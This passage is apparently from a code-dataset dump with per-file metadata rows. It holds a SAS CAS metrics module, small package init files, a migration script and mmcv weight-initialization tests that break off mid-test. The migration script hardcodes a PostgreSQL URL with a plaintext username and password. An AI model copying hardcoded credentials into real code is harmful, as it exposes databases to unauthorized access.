        when they come from different CASTables, since observation order
        is not guaranteed in a distributed computing environment.
        Default = None

    Returns
    -------
    score : float
    '''
    # The assess action expects the event level as a string.
    if not isinstance(pos_label, str):
        pos_label = str(pos_label)
    (y_true, y_score, castable,
     conn, tmp_table_created) = _check_inputs(y_true, y_score, castable=castable,
                                              return_target_dtype=False,
                                              id_vars=id_vars)
    conn.retrieve('loadactionset', _messagelevel='error', actionset='percentile')
    res = conn.retrieve('percentile.assess', _messagelevel='error',
                        table=castable, inputs=y_score, response=y_true,
                        event=pos_label, cutstep=cutstep)
    # _check_inputs may have created a temporary merged table; drop it.
    if tmp_table_created:
        conn.retrieve('table.droptable', _messagelevel='error', name=castable.name)
    rocinfo = res['ROCInfo']
    # FDR is undefined when nothing is predicted positive (TP + FP == 0);
    # set it to 0 so that precision = 1 - FDR = 1 at those cutoffs.
    rocinfo.loc[rocinfo.TP + rocinfo.FP == 0, 'FDR'] = 0
    fdr = list(rocinfo.FDR) + [0]
    precision = [1 - x for x in fdr]
    recall = list(rocinfo.Sensitivity) + [0]
    if interpolate:
        # Area under the PR curve by the trapezoidal rule, i.e. with
        # linear interpolation between consecutive cutoffs.
        ap = sum(np.mean(precision[i:i + 2]) * (recall[i] - recall[i + 1])
                 for i in range(len(recall) - 1))
    else:
        # Step-wise sum matching scikit-learn's definition (no interpolation):
        # https://scikit-learn.org/stable/modules/generated/sklearn.metrics.average_precision_score.html
        ap = sum(p * (r - r_next)
                 for p, r, r_next in zip(precision, recall, recall[1:]))
    return ap
def f1_score(y_true, y_pred, pos_label, castable=None, id_vars=None):
    r'''
    Compute the F1 score of a binary classification task. The F1 score is
    defined as :math:`\frac{2PR}{P+R}`, where :math:`P` is the precision
    and :math:`R` is the recall of the positive class.

    Parameters
    ----------
    y_true : string or :class:`CASColumn`
        The column of ground truth labels. When it is a string, y_pred
        must also be a string and both columns must belong to the CASTable
        given by ``castable``. When it is a :class:`CASColumn`, y_pred
        must also be a :class:`CASColumn` (possibly from a different
        CASTable) and the ``castable`` argument is ignored.
    y_pred : string or :class:`CASColumn`
        The column of predicted class labels, following the same typing
        rules as y_true.
    pos_label : string, int or float
        The positive class label.
    castable : :class:`CASTable`, optional
        Source table used when y_true and y_pred are strings.
        Default = None
    id_vars : string or list of strings, optional
        Column names serving as a unique id to match y_true and y_pred
        when they come from different CASTables, since observation order
        is not guaranteed in a distributed computing environment.
        Default = None

    Returns
    -------
    score : float
    '''
    conf_mat = confusion_matrix(y_true, y_pred, castable=castable, id_vars=id_vars)
    # Index by label (.loc), not position (.iloc): the confusion matrix is
    # indexed by the actual class labels, which may be strings or arbitrary
    # numbers, so positional indexing would raise for string labels and
    # silently pick the wrong cell for non-positional numeric labels.
    true_pos = conf_mat.loc[pos_label, pos_label]
    recall = true_pos / conf_mat.loc[pos_label, :].sum()
    precision = true_pos / conf_mat.loc[:, pos_label].sum()
    if precision + recall == 0:
        # Degenerate case (no true positives at all): F1 is 0 by convention,
        # avoiding a 0/0 in the harmonic mean below.
        return 0.0
    return 2 * precision * recall / (precision + recall)
def explained_variance_score(y_true, y_pred, castable=None, id_vars=None):
    '''
    Compute the explained variance score of a regression task, i.e. the
    fraction of the target variable's variance that the model explains.

    Parameters
    ----------
    y_true : string or :class:`CASColumn`
        The column of ground truth target values. When it is a string,
        y_pred must also be a string and both columns must belong to the
        CASTable given by ``castable``. When it is a :class:`CASColumn`,
        y_pred must also be a :class:`CASColumn` (possibly from a
        different CASTable) and the ``castable`` argument is ignored.
    y_pred : string or :class:`CASColumn`
        The column of predicted target values, following the same typing
        rules as y_true.
    castable : :class:`CASTable`, optional
        Source table used when y_true and y_pred are strings.
        Default = None
    id_vars : string or list of strings, optional
        Column names serving as a unique id to match y_true and y_pred
        when they come from different CASTables, since observation order
        is not guaranteed in a distributed computing environment.
        Default = None

    Returns
    -------
    score : float
    '''
    (y_true, y_pred, castable,
     conn, tmp_table_created) = _check_inputs(y_true, y_pred, castable=castable,
                                              return_target_dtype=False,
                                              id_vars=id_vars)
    # Choose a residual column name that does not collide with an existing
    # column, so the computed variable neither duplicates nor overwrites one.
    err_col = 'err'
    while err_col in castable.columns:
        err_col = random_name(name='err_')
    # View of the table with the residual (y_true - y_pred) as a computed column.
    castable = conn.CASTable(
        castable.name,
        computedvars=[{"name": err_col}],
        computedvarsprogram='{2}={0}-{1}'.format(y_true, y_pred, err_col))
    # Explained variance = 1 - Var(residual) / Var(target).
    expl_var = 1 - castable[err_col].var() / castable[y_true].var()
    # _check_inputs may have created a temporary merged table; drop it.
    if tmp_table_created:
        conn.retrieve('table.droptable', _messagelevel='error', name=castable.name)
    return expl_var
def mean_absolute_error(y_true, y_pred, castable=None, id_vars=None):
    '''
    Compute the mean absolute error of a regression task.

    Parameters
    ----------
    y_true : string or :class:`CASColumn`
        The column of ground truth target values. When it is a string,
        y_pred must also be a string and both columns must belong to the
        CASTable given by ``castable``. When it is a :class:`CASColumn`,
        y_pred must also be a :class:`CASColumn` (possibly from a
        different CASTable) and the ``castable`` argument is ignored.
    y_pred : string or :class:`CASColumn`
        The column of predicted target values, following the same typing
        rules as y_true.
    castable : :class:`CASTable`, optional
        Source table used when y_true and y_pred are strings.
        Default = None
    id_vars : string or list of strings, optional
        Column names serving as a unique id to match y_true and y_pred
        when they come from different CASTables, since observation order
        is not guaranteed in a distributed computing environment.
        Default = None

    Returns
    -------
    loss : float
    '''
    (y_true, y_pred, castable,
     conn, tmp_table_created) = _check_inputs(y_true, y_pred, castable=castable,
                                              return_target_dtype=False,
                                              id_vars=id_vars)
    # Choose an error column name that does not collide with an existing
    # column, so the computed variable neither duplicates nor overwrites one.
    err_col = 'abserr'
    while err_col in castable.columns:
        err_col = random_name(name='abserr_')
    # View of the table with |y_true - y_pred| as a computed column.
    castable = conn.CASTable(
        castable.name,
        computedvars=[{"name": err_col}],
        computedvarsprogram='{2}=abs({0}-{1})'.format(y_true, y_pred, err_col))
    mae = castable[err_col].mean()
    # _check_inputs may have created a temporary merged table; drop it.
    if tmp_table_created:
        conn.retrieve('table.droptable', _messagelevel='error', name=castable.name)
    return mae
def mean_squared_error(y_true, y_pred, castable=None, id_vars=None):
    '''
    Compute the mean squared error of a regression task.

    Parameters
    ----------
    y_true : string or :class:`CASColumn`
        The column of ground truth target values. When it is a string,
        y_pred must also be a string and both columns must belong to the
        CASTable given by ``castable``. When it is a :class:`CASColumn`,
        y_pred must also be a :class:`CASColumn` (possibly from a
        different CASTable) and the ``castable`` argument is ignored.
    y_pred : string or :class:`CASColumn`
        The column of predicted target values, following the same typing
        rules as y_true.
    castable : :class:`CASTable`, optional
        Source table used when y_true and y_pred are strings.
        Default = None
    id_vars : string or list of strings, optional
        Column names serving as a unique id to match y_true and y_pred
        when they come from different CASTables, since observation order
        is not guaranteed in a distributed computing environment.
        Default = None

    Returns
    -------
    loss : float
    '''
    (y_true, y_pred, castable,
     conn, tmp_table_created) = _check_inputs(y_true, y_pred, castable=castable,
                                              return_target_dtype=False,
                                              id_vars=id_vars)
    # Choose an error column name that does not collide with an existing
    # column, so the computed variable neither duplicates nor overwrites one.
    err_col = 'err2'
    while err_col in castable.columns:
        err_col = random_name(name='err2_')
    # View of the table with (y_true - y_pred)**2 as a computed column.
    castable = conn.CASTable(
        castable.name,
        computedvars=[{"name": err_col}],
        computedvarsprogram='{2}=({0}-{1})**2'.format(y_true, y_pred, err_col))
    mse = castable[err_col].mean()
    # _check_inputs may have created a temporary merged table; drop it.
    if tmp_table_created:
        conn.retrieve('table.droptable', _messagelevel='error', name=castable.name)
    return mse
def mean_squared_log_error(y_true, y_pred, castable=None, id_vars=None):
    '''
    Compute the mean squared logarithmic error of a regression task.

    Parameters
    ----------
    y_true : string or :class:`CASColumn`
        The column of ground truth target values. When it is a string,
        y_pred must also be a string and both columns must belong to the
        CASTable given by ``castable``. When it is a :class:`CASColumn`,
        y_pred must also be a :class:`CASColumn` (possibly from a
        different CASTable) and the ``castable`` argument is ignored.
    y_pred : string or :class:`CASColumn`
        The column of predicted target values, following the same typing
        rules as y_true.
    castable : :class:`CASTable`, optional
        Source table used when y_true and y_pred are strings.
        Default = None
    id_vars : string or list of strings, optional
        Column names serving as a unique id to match y_true and y_pred
        when they come from different CASTables, since observation order
        is not guaranteed in a distributed computing environment.
        Default = None

    Returns
    -------
    loss : float
    '''
    (y_true, y_pred, castable,
     conn, tmp_table_created) = _check_inputs(y_true, y_pred, castable=castable,
                                              return_target_dtype=False,
                                              id_vars=id_vars)
    # Choose an error column name that does not collide with an existing
    # column, so the computed variable neither duplicates nor overwrites one.
    err_col = 'logerr2'
    while err_col in castable.columns:
        err_col = random_name(name='logerr2_')
    # View of the table with (log(1+y_true) - log(1+y_pred))**2 computed
    # server-side as a new column.
    castable = conn.CASTable(
        castable.name,
        computedvars=[{"name": err_col}],
        computedvarsprogram='{2}=(log(1+{0})-log(1+{1}))**2'.format(y_true, y_pred, err_col))
    msle = castable[err_col].mean()
    # _check_inputs may have created a temporary merged table; drop it.
    if tmp_table_created:
        conn.retrieve('table.droptable', _messagelevel='error', name=castable.name)
    return msle
def r2_score(y_true, y_pred, castable=None, id_vars=None):
    '''
    Compute the R^2 (coefficient of determination) regression score.

    Parameters
    ----------
    y_true : string or :class:`CASColumn`
        The column of ground truth target values. When it is a string,
        y_pred must also be a string and both columns must belong to the
        CASTable given by ``castable``. When it is a :class:`CASColumn`,
        y_pred must also be a :class:`CASColumn` (possibly from a
        different CASTable) and the ``castable`` argument is ignored.
    y_pred : string or :class:`CASColumn`
        The column of predicted target values, following the same typing
        rules as y_true.
    castable : :class:`CASTable`, optional
        Source table used when y_true and y_pred are strings.
        Default = None
    id_vars : string or list of strings, optional
        Column names serving as a unique id to match y_true and y_pred
        when they come from different CASTables, since observation order
        is not guaranteed in a distributed computing environment.
        Default = None

    Returns
    -------
    loss : float
    '''
    # Mean squared error over the (possibly merged) data.
    mse = mean_squared_error(y_true, y_pred, castable=castable, id_vars=id_vars)
    (y_true, y_pred, castable,
     conn, tmp_table_created) = _check_inputs(y_true, y_pred, castable=castable,
                                              return_target_dtype=False,
                                              id_vars=id_vars)
    # Count only complete observation pairs (rows where both values exist).
    nobs = castable[[y_true, y_pred]].dropna().shape[0]
    residual_ss = mse * nobs
    total_ss = castable[y_true].var() * (nobs - 1)
    r2 = 1 - residual_ss / total_ss
    # _check_inputs may have created a temporary merged table; drop it.
    if tmp_table_created:
        conn.retrieve('table.droptable', _messagelevel='error', name=castable.name)
    return r2
def _check_inputs(y_true, y_pred, castable=None, return_target_dtype=False, id_vars=None):
    '''
    Check the input argument y_true, y_pred, and return their names if they are CASColumn.
    If y_true, and y_pred is in the form of CASColumn and from different CASTables,
    a temporary CASTable will be created which contains both columns.

    Parameters
    ----------
    y_true : string or :class:`CASColumn`
        The column of the ground truth labels. If it is a string, then
        y_pred has to be a string and they both belongs to the same CASTable specified
        by the castable argument. If it is a :class:`CASColumn`, then y_pred has to be
        a :class:`CASColumn`, and the castable argument is ignored. When both y_pred
        and y_true are :class:`CASColumn`, they can be in different CASTables.
    y_pred : string or :class:`CASColumn`
        The column of the predicted class labels. If it is a string, then
        y_true has to be a string and they both belongs to the same CASTable specified
        by the castable argument. If it is a :class:`CASColumn`, then y_true has to be
        a :class:`CASColumn`, and the castable argument is ignored. When both y_pred
        and y_true are :class:`CASColumn`, they can be in different CASTables.
    castable : :class:`CASTable`, optional
        The CASTable object to use as the source if the y_pred and y_true are strings.
        Default = None
    return_target_dtype : boolean, optional
        If True, return the data type of y_true in the CASTable.
        Default = False
    id_vars : string or list of strings, optional
        Column names that serve as unique id for y_true and y_pred if they are
        from different CASTables. The column names need to appear in both CASTables,
        and they serve to match y_true and y_pred appropriately, since observation
        orders can be shuffled in distributed computing environment.
        Default = None.

    Returns
    -------
    y_true : string
        The column name of the y_true column.
    y_pred : string
        The column name of the y_pred column.
    castable : :class:`CASTable`
        The original CASTable if y_true and y_pred are in the same castable. The
        temporary table that contain both columns if y_true and y_pred is from
        different CASTable.
    conn : :class:`CAS`
        The connection on the CASColumn or CASTable.
    tmp_table_created : boolean
        Whether a temporary CASTable is created to host y_true and y_pred.
    target_dtype : string
        The data type of y_true in the CASTable.
        Only provided if `return_target_dtype` is True.
    '''
    tmp_table_created = False
    if isinstance(y_pred, str) and isinstance(y_true, str):
        # Column-name form: both columns must come from the single table
        # passed as `castable`.
        if not isinstance(castable, CASTable):
            raise ValueError('castable need to be a CASTable if y_true and y_pred are strings')
        conn = castable.get_connection()
        if return_target_dtype:
            # Look up the declared type of the y_true column in the table.
            colinfo = castable.columninfo().ColumnInfo
            target_dtype = colinfo.Type[colinfo.Column==y_true].values[0]
    elif isinstance(y_pred, CASColumn) and isinstance(y_true, CASColumn):
        conn = y_true.get_connection()
        # Names of the underlying source tables of the two columns.
        y_true_tblname = y_true.to_outtable_params()['name']
        y_pred_tblname = y_pred.to_outtable_params()['name']
        if return_target_dtype:
            colinfo = y_true.columninfo().ColumnInfo
            target_dtype = colinfo.Type[colinfo.Column==y_true.name].values[0]
        # From here on only the column names are needed.
        y_true = y_true.name
        y_pred = y_pred.name
        if y_true_tblname != y_pred_tblname:
            # The columns live in different tables: merge them into a
            # temporary table with a randomized name.
            tmp_table_name = random_name('metric_tmp',6)
            if id_vars is None:
                # Without id columns the merge is positional, which is only
                # reliable when row order is preserved — warn the caller.
                warnings.warn('{} and {} are from different CASTables, '.format(y_true, y_pred) +
                              'and their appropriate matching may not be guaranteed '+
                              'unless id_vars argument is provided.')
                sascode = '''
                data {};
                merge {}(keep={}) {}(keep={});
                run;
                '''.format(tmp_table_name, y_true_tblname, y_true, y_pred_tblname, y_pred)
                # single='Yes' runs the data step on a single thread so the
                # positional merge is not scrambled by distributed execution.
                conn.retrieve('dataStep.runCode', _messagelevel='error', code=sascode, single='Yes')
            else:
                if not isinstance(id_vars, list):
                    id_vars = [id_vars]
                # Keep the id columns alongside each value column and merge
                # BY the id variables, so rows are matched on id, not order.
                y_true_keep = ' '.join([y_true]+id_vars)
                y_pred_keep = ' '.join([y_pred]+id_vars)
                by_var = ' '.join(id_vars)
                sascode = '''
                data {};
                merge {}(keep={}) {}(keep={});
                by {};
                run;
                '''.format(tmp_table_name, y_true_tblname, y_true_keep, y_pred_tblname, y_pred_keep, by_var)
                conn.retrieve('dataStep.runCode', _messagelevel='error', code=sascode)
            castable = conn.CASTable(tmp_table_name)
            tmp_table_created = True
        else:
            # Same source table: just reference it directly.
            castable = conn.CASTable(y_true_tblname)
    else:
        raise ValueError('Input for ground truth and predicted value need to be the same type of either '+
                         'strings representing column names or CASColumns')
    if return_target_dtype:
        return (y_true, y_pred, castable, conn, tmp_table_created, target_dtype)
    else:
        return (y_true, y_pred, castable, conn, tmp_table_created)
| 43.954155
| 109
| 0.659583
| 6,505
| 46,020
| 4.522521
| 0.066872
| 0.032462
| 0.009178
| 0.012373
| 0.83045
| 0.814712
| 0.807845
| 0.798362
| 0.791937
| 0.78983
| 0
| 0.007555
| 0.2608
| 46,020
| 1,046
| 110
| 43.996176
| 0.857252
| 0.567579
| 0
| 0.580737
| 0
| 0
| 0.08811
| 0.001676
| 0
| 0
| 0
| 0
| 0
| 1
| 0.036827
| false
| 0
| 0.025496
| 0
| 0.104816
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
e4049e44df387ce85d90ceaa44d0c0834dd32dc8
| 131
|
py
|
Python
|
accountifie/toolkit/utils/__init__.py
|
imcallister/accountifie
|
094834c9d632e0353e3baf8d924eeb10cba0add4
|
[
"MIT",
"Unlicense"
] | 4
|
2017-06-02T08:48:48.000Z
|
2021-11-21T23:57:15.000Z
|
accountifie/toolkit/utils/__init__.py
|
imcallister/accountifie
|
094834c9d632e0353e3baf8d924eeb10cba0add4
|
[
"MIT",
"Unlicense"
] | 3
|
2020-06-05T16:55:42.000Z
|
2021-06-10T17:43:12.000Z
|
accountifie/toolkit/utils/__init__.py
|
imcallister/accountifie
|
094834c9d632e0353e3baf8d924eeb10cba0add4
|
[
"MIT",
"Unlicense"
] | 4
|
2015-12-15T14:27:51.000Z
|
2017-04-21T21:42:27.000Z
|
from .everything import *
from .datefuncs import *
from .gl_helpers import *
from .tables import *
from .highchart_config import *
| 21.833333
| 31
| 0.770992
| 17
| 131
| 5.823529
| 0.529412
| 0.40404
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152672
| 131
| 5
| 32
| 26.2
| 0.891892
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7c168b649002343fb46587d98b8d61c78fed885b
| 108
|
py
|
Python
|
lib/backbone/__init__.py
|
sx14/BBN
|
e67f3f684ad7965396387dacab50a53cfa3be32b
|
[
"MIT"
] | null | null | null |
lib/backbone/__init__.py
|
sx14/BBN
|
e67f3f684ad7965396387dacab50a53cfa3be32b
|
[
"MIT"
] | null | null | null |
lib/backbone/__init__.py
|
sx14/BBN
|
e67f3f684ad7965396387dacab50a53cfa3be32b
|
[
"MIT"
] | null | null | null |
from .resnet import res50, bbn_res50
from .resnet_cifar import res32_cifar, bbn_res32_cifar, res32_cifar_mb
| 36
| 70
| 0.851852
| 18
| 108
| 4.722222
| 0.444444
| 0.352941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.103093
| 0.101852
| 108
| 2
| 71
| 54
| 0.773196
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7c297ed983988807f27a70f8cf040487cc5d1e11
| 221
|
py
|
Python
|
src/closure_table/auth/db/manage.py
|
vyacheslav-bezborodov/dvhb
|
b3ff8bee6274c29e49f053ad8bc3f6ca050ec584
|
[
"MIT"
] | 1
|
2018-05-13T13:04:51.000Z
|
2018-05-13T13:04:51.000Z
|
src/closure_table/auth/db/manage.py
|
vyacheslav-bezborodov/closure-table-meetup
|
a606db0dbd736f4fe70cea1883649412a560902c
|
[
"MIT"
] | null | null | null |
src/closure_table/auth/db/manage.py
|
vyacheslav-bezborodov/closure-table-meetup
|
a606db0dbd736f4fe70cea1883649412a560902c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
from migrate.versioning.shell import main
if __name__ == '__main__':
main(repository='src/closure_table/auth/db/', debug='False', url='postgresql://closureuser:closurepass@localhost/closuredb')
| 36.833333
| 128
| 0.760181
| 28
| 221
| 5.678571
| 0.928571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081448
| 221
| 5
| 129
| 44.2
| 0.783251
| 0.090498
| 0
| 0
| 0
| 0
| 0.475
| 0.41
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 6
|
7c2a4b796c918d7a2b51753c2603b0bdcc37d775
| 22,748
|
py
|
Python
|
tests/test_cnn/test_weight_init.py
|
raoshenglong/mmcv
|
e22740b1d6953d75a0acecce4455d23800b1f018
|
[
"Apache-2.0"
] | 3,748
|
2018-10-12T08:39:46.000Z
|
2022-03-31T17:22:55.000Z
|
tests/test_cnn/test_weight_init.py
|
raoshenglong/mmcv
|
e22740b1d6953d75a0acecce4455d23800b1f018
|
[
"Apache-2.0"
] | 1,637
|
2018-10-12T06:06:18.000Z
|
2022-03-31T02:20:53.000Z
|
tests/test_cnn/test_weight_init.py
|
raoshenglong/mmcv
|
e22740b1d6953d75a0acecce4455d23800b1f018
|
[
"Apache-2.0"
] | 1,234
|
2018-10-12T09:28:20.000Z
|
2022-03-31T15:56:24.000Z
|
# Copyright (c) OpenMMLab. All rights reserved.
import random
from tempfile import TemporaryDirectory
import numpy as np
import pytest
import torch
from scipy import stats
from torch import nn
from mmcv.cnn import (Caffe2XavierInit, ConstantInit, KaimingInit, NormalInit,
PretrainedInit, TruncNormalInit, UniformInit, XavierInit,
bias_init_with_prob, caffe2_xavier_init, constant_init,
initialize, kaiming_init, normal_init, trunc_normal_init,
uniform_init, xavier_init)
def test_constant_init():
conv_module = nn.Conv2d(3, 16, 3)
constant_init(conv_module, 0.1)
assert conv_module.weight.allclose(
torch.full_like(conv_module.weight, 0.1))
assert conv_module.bias.allclose(torch.zeros_like(conv_module.bias))
conv_module_no_bias = nn.Conv2d(3, 16, 3, bias=False)
constant_init(conv_module_no_bias, 0.1)
assert conv_module.weight.allclose(
torch.full_like(conv_module.weight, 0.1))
def test_xavier_init():
conv_module = nn.Conv2d(3, 16, 3)
xavier_init(conv_module, bias=0.1)
assert conv_module.bias.allclose(torch.full_like(conv_module.bias, 0.1))
xavier_init(conv_module, distribution='uniform')
# TODO: sanity check of weight distribution, e.g. mean, std
with pytest.raises(AssertionError):
xavier_init(conv_module, distribution='student-t')
conv_module_no_bias = nn.Conv2d(3, 16, 3, bias=False)
xavier_init(conv_module_no_bias)
def test_normal_init():
conv_module = nn.Conv2d(3, 16, 3)
normal_init(conv_module, bias=0.1)
# TODO: sanity check of weight distribution, e.g. mean, std
assert conv_module.bias.allclose(torch.full_like(conv_module.bias, 0.1))
conv_module_no_bias = nn.Conv2d(3, 16, 3, bias=False)
normal_init(conv_module_no_bias)
# TODO: sanity check distribution, e.g. mean, std
def test_trunc_normal_init():
def _random_float(a, b):
return (b - a) * random.random() + a
def _is_trunc_normal(tensor, mean, std, a, b):
# scipy's trunc norm is suited for data drawn from N(0, 1),
# so we need to transform our data to test it using scipy.
z_samples = (tensor.view(-1) - mean) / std
z_samples = z_samples.tolist()
a0 = (a - mean) / std
b0 = (b - mean) / std
p_value = stats.kstest(z_samples, 'truncnorm', args=(a0, b0))[1]
return p_value > 0.0001
conv_module = nn.Conv2d(3, 16, 3)
mean = _random_float(-3, 3)
std = _random_float(.01, 1)
a = _random_float(mean - 2 * std, mean)
b = _random_float(mean, mean + 2 * std)
trunc_normal_init(conv_module, mean, std, a, b, bias=0.1)
assert _is_trunc_normal(conv_module.weight, mean, std, a, b)
assert conv_module.bias.allclose(torch.full_like(conv_module.bias, 0.1))
conv_module_no_bias = nn.Conv2d(3, 16, 3, bias=False)
trunc_normal_init(conv_module_no_bias)
# TODO: sanity check distribution, e.g. mean, std
def test_uniform_init():
conv_module = nn.Conv2d(3, 16, 3)
uniform_init(conv_module, bias=0.1)
# TODO: sanity check of weight distribution, e.g. mean, std
assert conv_module.bias.allclose(torch.full_like(conv_module.bias, 0.1))
conv_module_no_bias = nn.Conv2d(3, 16, 3, bias=False)
uniform_init(conv_module_no_bias)
def test_kaiming_init():
conv_module = nn.Conv2d(3, 16, 3)
kaiming_init(conv_module, bias=0.1)
# TODO: sanity check of weight distribution, e.g. mean, std
assert conv_module.bias.allclose(torch.full_like(conv_module.bias, 0.1))
kaiming_init(conv_module, distribution='uniform')
with pytest.raises(AssertionError):
kaiming_init(conv_module, distribution='student-t')
conv_module_no_bias = nn.Conv2d(3, 16, 3, bias=False)
kaiming_init(conv_module_no_bias)
def test_caffe_xavier_init():
    """Smoke-test caffe2_xavier_init on a conv module."""
    module = nn.Conv2d(3, 16, 3)
    caffe2_xavier_init(module)
def test_bias_init_with_prob():
    """Test that bias_init_with_prob fills the bias with -log((1-p)/p)."""
    conv_module = nn.Conv2d(3, 16, 3)
    prior_prob = 0.1
    # Fixed: use the named constant instead of repeating the literal 0.1,
    # so the assertion below always checks the probability actually used.
    normal_init(conv_module, bias=bias_init_with_prob(prior_prob))
    # TODO: sanity check of weight distribution, e.g. mean, std
    bias = float(-np.log((1 - prior_prob) / prior_prob))
    assert conv_module.bias.allclose(torch.full_like(conv_module.bias, bias))
def test_constaninit():
    """Test the ConstantInit initializer class."""
    model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Linear(1, 2))

    # Only Conv2d layers are touched when layer='Conv2d'.
    init = ConstantInit(val=1, bias=2, layer='Conv2d')
    init(model)
    conv, linear = model[0], model[2]
    assert torch.equal(conv.weight, torch.full(conv.weight.shape, 1.))
    assert torch.equal(conv.bias, torch.full(conv.bias.shape, 2.))
    assert not torch.equal(linear.weight, torch.full(linear.weight.shape, 1.))
    assert not torch.equal(linear.bias, torch.full(linear.bias.shape, 2.))

    # bias_prob converts a prior probability into the bias value.
    init = ConstantInit(val=3, bias_prob=0.01, layer='Linear')
    init(model)
    res = bias_init_with_prob(0.01)
    assert torch.equal(conv.weight, torch.full(conv.weight.shape, 1.))
    assert torch.equal(linear.weight, torch.full(linear.weight.shape, 3.))
    assert torch.equal(conv.bias, torch.full(conv.bias.shape, 2.))
    assert torch.equal(linear.bias, torch.full(linear.bias.shape, res))

    # The layer key also accepts a base class name such as _ConvNd.
    model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Conv1d(1, 2, 1))
    init = ConstantInit(val=4., bias=5., layer='_ConvNd')
    init(model)
    assert torch.all(model[0].weight == 4.)
    assert torch.all(model[2].weight == 4.)
    assert torch.all(model[0].bias == 5.)
    assert torch.all(model[2].bias == 5.)

    # Invalid argument types must raise TypeError.
    with pytest.raises(TypeError):
        init = ConstantInit(val=1, bias='1')
    with pytest.raises(TypeError):
        init = ConstantInit(val=1, bias_prob='1')
    with pytest.raises(TypeError):
        init = ConstantInit(val=1, layer=1)
def test_xavierinit():
    """Test the XavierInit initializer class."""
    model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Linear(1, 2))
    func = XavierInit(bias=0.1, layer='Conv2d')
    func(model)
    # Fixed: build each reference tensor from the bias it is compared
    # against; the original used the *other* module's bias in full_like,
    # relying on accidental broadcasting between shapes (1,) and (2,).
    assert model[0].bias.allclose(torch.full_like(model[0].bias, 0.1))
    assert not model[2].bias.allclose(torch.full_like(model[2].bias, 0.1))

    # Zero everything first so we can detect that Xavier changed the weights.
    constant_func = ConstantInit(val=0, bias=0, layer=['Conv2d', 'Linear'])
    func = XavierInit(gain=100, bias_prob=0.01, layer=['Conv2d', 'Linear'])
    model.apply(constant_func)
    assert torch.equal(model[0].weight, torch.full(model[0].weight.shape, 0.))
    assert torch.equal(model[2].weight, torch.full(model[2].weight.shape, 0.))
    assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, 0.))
    assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, 0.))

    res = bias_init_with_prob(0.01)
    func(model)
    assert not torch.equal(model[0].weight,
                           torch.full(model[0].weight.shape, 0.))
    assert not torch.equal(model[2].weight,
                           torch.full(model[2].weight.shape, 0.))
    assert torch.equal(model[0].bias, torch.full(model[0].bias.shape, res))
    assert torch.equal(model[2].bias, torch.full(model[2].bias.shape, res))

    # test layer key with base class name
    model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Conv1d(1, 2, 1))
    func = ConstantInit(val=4., bias=5., layer='_ConvNd')
    func(model)
    assert torch.all(model[0].weight == 4.)
    assert torch.all(model[2].weight == 4.)
    assert torch.all(model[0].bias == 5.)
    assert torch.all(model[2].bias == 5.)

    func = XavierInit(gain=100, bias_prob=0.01, layer='_ConvNd')
    func(model)
    assert not torch.all(model[0].weight == 4.)
    assert not torch.all(model[2].weight == 4.)
    assert torch.all(model[0].bias == res)
    assert torch.all(model[2].bias == res)

    # test bias input type
    with pytest.raises(TypeError):
        func = XavierInit(bias='0.1', layer='Conv2d')
    # test layer input type
    with pytest.raises(TypeError):
        func = XavierInit(bias=0.1, layer=1)
def test_normalinit():
    """Test the NormalInit initializer class."""
    model = nn.Sequential(nn.Conv2d(3, 1, 3), nn.ReLU(), nn.Linear(1, 2))

    # With a tiny std every weight is effectively equal to the mean.
    init_fn = NormalInit(
        mean=100, std=1e-5, bias=200, layer=['Conv2d', 'Linear'])
    init_fn(model)
    assert model[0].weight.allclose(torch.tensor(100.))
    assert model[2].weight.allclose(torch.tensor(100.))
    assert model[0].bias.allclose(torch.tensor(200.))
    assert model[2].bias.allclose(torch.tensor(200.))

    # bias_prob converts a prior probability into the bias value.
    init_fn = NormalInit(
        mean=300, std=1e-5, bias_prob=0.01, layer=['Conv2d', 'Linear'])
    expected_bias = bias_init_with_prob(0.01)
    init_fn(model)
    assert model[0].weight.allclose(torch.tensor(300.))
    assert model[2].weight.allclose(torch.tensor(300.))
    assert model[0].bias.allclose(torch.tensor(expected_bias))
    assert model[2].bias.allclose(torch.tensor(expected_bias))

    # The layer key also accepts a base class name such as _ConvNd.
